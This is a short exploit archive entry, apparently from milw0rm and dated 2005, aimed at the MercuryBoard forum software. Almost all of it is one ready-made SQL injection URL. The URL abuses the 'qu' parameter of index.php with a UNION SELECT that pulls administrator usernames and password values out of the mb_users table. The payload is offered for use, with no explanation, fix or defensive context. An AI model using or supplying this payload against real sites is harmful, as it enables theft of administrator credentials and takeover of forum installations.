# little late posting this /str0ke
Exploit:
http://www.site.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION%20SELECT%20user_password,user_name%20from%20mb_users%20where%20user_group%20=%201%20limit%201/*
# milw0rm.com [2005-02-12]